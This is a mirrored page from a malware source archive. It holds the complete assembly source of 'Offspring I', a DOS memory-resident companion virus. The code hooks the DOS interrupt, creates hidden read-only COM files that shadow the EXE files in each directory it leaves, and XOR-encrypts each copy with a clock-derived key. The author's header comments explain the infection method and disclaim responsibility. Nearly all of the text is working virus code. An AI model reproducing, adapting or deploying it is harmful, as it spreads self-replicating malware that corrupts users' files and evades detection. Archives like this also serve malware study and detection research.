mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 18:02:48 +00:00
440 lines
11 KiB
NASM
440 lines
11 KiB
NASM
;-------------------------------------------------------------------------
|
|
; OSPRING.COM - Make sure you compile this to a COM file
|
|
; - Compatible with A86 v3.22
|
|
; OFFSPRING I - By VG Enterprises (Virogen)
|
|
;
|
|
; NOTICE : Don't hold me responsible for any damages, or the release
|
|
; of this virus. Use this at your own risk. NOT intended
|
|
; for any lamers to upload the Mcafee! Thank you for your
|
|
; loyal obendience.
|
|
;
|
|
; TYPE : SPAWNING RESIDENT
|
|
; VERSION : BETA 0.05
|
|
;
|
|
; FIXED/NEW IN VERSION 0.05
|
|
; - Mutation engine much smaller
|
|
; - Now change interrupt vectors directly
|
|
; - The XOR number is now generated randomly
|
|
; using the system clock as a base.
|
|
; - The FF/FN buffer has been moved outside
|
|
; of the virus code, so disk space is
|
|
; lowered.
|
|
;
|
|
; INFECTION METHOD : Everytime DOS changes directories, or changes
|
|
; drives... all files in the CURRENT directory
|
|
; (the one you're coming out of) will be infected.
|
|
; COM files will be hidden, and have the read-only
|
|
; attribute. When they are executed they will
|
|
; check if the virus is already in memory, and
|
|
; then execute the corresponding EXE file. See
|
|
; DOCS.
|
|
;
|
|
; This virus is NOT completed, so don't go off when you find a
|
|
; bug. There is one that I haven't determined the cause of yet,
|
|
; Do a 'DIR' of a directory other than the current, and see
|
|
; what happens. There's still some variables that can be
|
|
; moved outside of the code, but it won't make a hell of
|
|
; a difference in size.
|
|
;
|
|
;
|
|
;
|
|
;
|
|
title off_spring_1
|
|
.286
|
|
cseg segment
|
|
assume cs: cseg, ss: cseg, es: cseg
|
|
|
|
signal equ 7dh ; Installation check
|
|
reply equ 0FCh ; Yep, we're here
|
|
|
|
cr equ 0dh ; carraige return
|
|
lf equ 0ah ; line feed
|
|
|
|
f_name equ 1eh ; Offset of file name in FF/FN buffer
|
|
f_sizel equ 1ch ; File size - low
|
|
|
|
org 100h ; Leave room for PSP
|
|
; jump to the beginning of the main procedure
|
|
start:
|
|
|
|
jmp no_dec ; Skip decryption, changes to NOP
|
|
lea di,enc_data+2 ; Point to byte after encryption num
|
|
mov dx,[di-2] ; load encryption num
|
|
call encrypt ; Decrypt the virus
|
|
no_dec:
|
|
jmp main ; Jump to main routine
|
|
|
|
enc_data DW 0000 ; Encryption Data - num we XOR by
|
|
|
|
|
|
ID DB cr,lf,'(c)1993 VG Enterprises',cr,lf ; my copyright
|
|
VNAME Db cr,lf,'* Congratulations, You have recieved the privelge of being infected by the *'
|
|
Db cr,lf,'* Offspring I v0.05. *','$'
|
|
|
|
fname db '*.EXE',0 ; Filespec to search for
|
|
|
|
sl db '\' ; Backslash for directory name
|
|
file_dir db 64 dup(0) ; directory of file we infected
|
|
file_name db 13 dup(0) ; filename of file we infected
|
|
old_dta dd 0 ; old seg:off of DTA
|
|
old21_ofs dw 0 ; Offset of old INT 21H
|
|
old21_seg dw 0 ; Seg of old INT 21h
|
|
|
|
par_blk dw 0 ; command line count byte -psp
|
|
par_cmd dw 0080h ; Point to the command line -psp
|
|
par_seg dw 0 ; seg
|
|
dw 05ch ; Use default FCB's in psp to save space
|
|
par1 dw 0 ;
|
|
dw 06ch ; FCB #2
|
|
par2 dw 0 ;
|
|
|
|
;--------------------------------------------------------------------
|
|
; This is our new INT 21H (dos) interrupt handler!
|
|
;
|
|
;
|
|
;---------------------------------------------------------------------
|
|
|
|
new21 proc ; New INT 21H handler
|
|
|
|
cmp ah, signal ; signaling us?
|
|
jne no
|
|
mov ah,reply ; yep, give our offspring what he wants
|
|
jmp end_21
|
|
no:
|
|
cmp ah, 3bh ;
|
|
je run_res ; Nope, jump
|
|
cmp ah,0eh
|
|
jne end_21
|
|
|
|
run_res:
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push di
|
|
push si
|
|
push bp
|
|
push ds
|
|
push es
|
|
push sp
|
|
push ss
|
|
|
|
push cs
|
|
pop ds
|
|
mov ah,2fh
|
|
int 21h ; Get the DTA
|
|
|
|
mov ax,es
|
|
mov word ptr cs: old_dta,bx
|
|
mov word ptr cs: old_dta+2,ax
|
|
push cs
|
|
pop es
|
|
|
|
call resident
|
|
|
|
mov dx,word ptr cs: old_dta
|
|
mov ax,word ptr cs: old_dta+2
|
|
mov ds,ax
|
|
mov ah,1ah
|
|
int 21h ; Restore the DTA
|
|
|
|
pop ss
|
|
pop sp
|
|
pop es
|
|
pop ds
|
|
pop bp
|
|
pop si
|
|
pop di
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
end_21 :
|
|
jmp [ dword ptr cs: old21_ofs] ; jump to original int 21h
|
|
iret
|
|
new21 endp ; End of handler
|
|
|
|
|
|
; ------------------------------------------------------------
|
|
; Main procedure
|
|
; -----------------------------------------------------------
|
|
main proc
|
|
|
|
|
|
mov word ptr [0100h],9090h ; NOP the jump past decryption
|
|
mov byte ptr [0102h],90h
|
|
mov bx,(offset vend+50) ; Calculate memory needed
|
|
mov cl,4 ; divide by 16
|
|
shr bx,cl
|
|
inc bx
|
|
mov ah,4ah
|
|
int 21h ; Release un-needed memory
|
|
|
|
mov ax,ds: 002ch ; Get environment address
|
|
mov par_blk,ax ; Save in parameter block for exec
|
|
|
|
mov par1,cs ; Save segments for EXEC
|
|
mov par2,cs
|
|
mov par_seg,cs
|
|
|
|
mov ah,2ah ; Get date
|
|
int 21h
|
|
|
|
cmp dl,14 ; 14th?
|
|
jne no_display
|
|
|
|
mov ah,09 ; Display message
|
|
lea dx,ID
|
|
int 21h
|
|
|
|
no_display:
|
|
call install ; check if installed, if not install
|
|
|
|
|
|
mov dx,offset file_dir -1 ; Execute the original EXE
|
|
mov bx,offset par_blk ; For some damned reason
|
|
mov ax,4b00h ; control is not returned back
|
|
int 21h ; to the virus.
|
|
|
|
push cs
|
|
pop ds
|
|
mov es,ds
|
|
|
|
mov ah,4ch ; Exit
|
|
int 21h
|
|
main endp
|
|
|
|
;---------------
|
|
; INSTALL - Install the virus
|
|
;---------------
|
|
|
|
Install Proc
|
|
|
|
mov ah,signal
|
|
int 21h
|
|
cmp ah,reply
|
|
je no_install
|
|
|
|
|
|
xor ax,ax
|
|
mov es,ax
|
|
mov ax,es: [21h*4+2]
|
|
mov bx,es: [21h*4]
|
|
mov ds: old21_seg,ax ; Store segment
|
|
mov ds: old21_ofs,bx ; Store offset
|
|
|
|
cli
|
|
|
|
mov es: [21h*4+2],cs ; Save seg
|
|
mov es: [21h*4],offset new21 ; off
|
|
|
|
sti
|
|
|
|
push cs
|
|
pop ds
|
|
mov es,ds
|
|
|
|
mov dx,(offset vend+50)
|
|
add dx,dx
|
|
; Calculate memory needed
|
|
mov cl,4 ; \ Divide by 16
|
|
shr dx,cl ; /
|
|
add dx,1 ;
|
|
|
|
mov ax,3100h ;
|
|
int 21H ; Terminate Stay Resident
|
|
ret
|
|
|
|
no_install:
|
|
ret
|
|
Install Endp
|
|
|
|
;------------------------
|
|
; Resident - This is called from the INT 21h handler
|
|
;-----------------------------
|
|
resident proc
|
|
|
|
mov ax,ds ; Calculate segment of MCB
|
|
dec ax ;
|
|
mov ds,ax ;
|
|
mov ds: [0001],word 0008h ; Mark DOS as the owner- so some
|
|
; utilities won't id the file the virus
|
|
; loaded from.
|
|
push cs
|
|
pop ds
|
|
|
|
|
|
mov word ptr vend,0 ; Clear ff/fn buffer
|
|
lea si, vend ;
|
|
lea di, vend+2 ;
|
|
mov cx,22 ;
|
|
cld ;
|
|
rep movsw ;
|
|
|
|
; Set DTA address - This is for the Findfirst/Findnext INT 21H functions
|
|
mov ah, 1ah
|
|
lea dx, vend
|
|
int 21h
|
|
|
|
|
|
|
|
|
|
; Find first .EXE file
|
|
mov ah, 4eh
|
|
mov cx, 0 ; Set normal file attribute search
|
|
lea dx, fname
|
|
int 21h
|
|
|
|
jnc next_loop
|
|
jmp end_prog
|
|
|
|
next_loop :
|
|
|
|
mov file_dir,0
|
|
lea si,file_dir
|
|
lea di,file_dir+1
|
|
mov cx,77
|
|
cld
|
|
rep movsb
|
|
|
|
mov ah,47h
|
|
xor dl,dl
|
|
lea si,file_dir
|
|
int 21h
|
|
|
|
cmp word ptr vend[f_sizel],0
|
|
jne find_file
|
|
|
|
xor bx,bx
|
|
lm3 :
|
|
inc bx
|
|
cmp file_dir[bx],0
|
|
jne lm3
|
|
|
|
mov file_dir[bx],'\'
|
|
inc bx
|
|
|
|
mov cx,13
|
|
lea si,vend[f_name]
|
|
lea di,file_dir[bx]
|
|
cld
|
|
rep movsb
|
|
|
|
xor bx,bx
|
|
mov bx,1eh
|
|
|
|
loop_me:
|
|
inc bx
|
|
cmp byte ptr vend[bx], '.'
|
|
jne loop_me
|
|
|
|
inc bx
|
|
mov word ptr vend [bx],'OC'
|
|
mov byte ptr vend [bx+2],'M'
|
|
|
|
|
|
call write_file ; Write virus to file
|
|
; Find next file
|
|
find_file :
|
|
|
|
mov ah,4fh
|
|
int 21h
|
|
jnc next_loop
|
|
|
|
end_prog:
|
|
exit :
|
|
ret
|
|
resident endp
|
|
|
|
;------------------------------------------------
|
|
; Write file procedure - Creates the file, writes the file, closes the file
|
|
;-----------------------------------------------
|
|
write_file proc
|
|
|
|
|
|
lea dx, vend[f_name]
|
|
mov ah, 3ch ; Create file
|
|
mov cx, 02h ; READ-ONLY
|
|
or cx, 01h ; Hidden
|
|
int 21h ; Call INT 21H
|
|
jc no_infect ; If Error-probably already infected
|
|
|
|
mov bx,ax
|
|
push dx
|
|
|
|
|
|
call copy_mem ; copy virus just outside of code
|
|
mov ah,2ch ;
|
|
int 21h ; Get random number from clock
|
|
lea di,vend+enc_data-204 ; offset of new copy of virus
|
|
|
|
mov [di-2],dx ; save encryption #
|
|
|
|
push bx
|
|
call encrypt ; writing it to a file
|
|
pop bx
|
|
|
|
mov cx, offset vend-100h ; # of bytes to write
|
|
lea dx, vend+50 ; Offset of buffer
|
|
mov ah, 40h ; -- our program in memory
|
|
int 21h ; Call INT 21H function 40h
|
|
|
|
pop dx
|
|
|
|
mov ah, 3eh
|
|
int 21h
|
|
no_infect:
|
|
ret ; Return
|
|
write_file endp
|
|
|
|
;------------------------------------------------
|
|
; Copies virus outside of code, to encrypt
|
|
;------------------------------------------------
|
|
copy_mem proc
|
|
|
|
|
|
mov si,0100h ; si=0
|
|
lea di,vend+50 ; destination
|
|
mov cx,offset vend-100h ; bytes to move
|
|
cld
|
|
rep movsb
|
|
|
|
ret
|
|
copy_mem endp
|
|
|
|
|
|
end_encrypt dw 0000h ; Let's encrypt everything up to here
|
|
|
|
;------------------------------------------------
|
|
; Encrypt
|
|
;
|
|
; Call with
|
|
; di=offset of encrypted/decrypted data
|
|
; dx=XOR value
|
|
;
|
|
; - First word to encrypt must be a free word.
|
|
; This word will be used as the encryption base. Every time the virus
|
|
; is encrypted a random number will be saved here.
|
|
;
|
|
;-----------------------------------------------
|
|
|
|
encrypt proc
|
|
|
|
mov cx,(offset end_encrypt - offset enc_data)/2
|
|
E2:
|
|
xor [di],dx ; Xor each word by dx
|
|
inc di
|
|
inc di ; increment index
|
|
loop E2 ; loop while cx != 0
|
|
|
|
ret
|
|
|
|
encrypt endp
|
|
|
|
|
|
|
|
vend dw 0
|
|
|
|
cseg ends
|
|
end start
|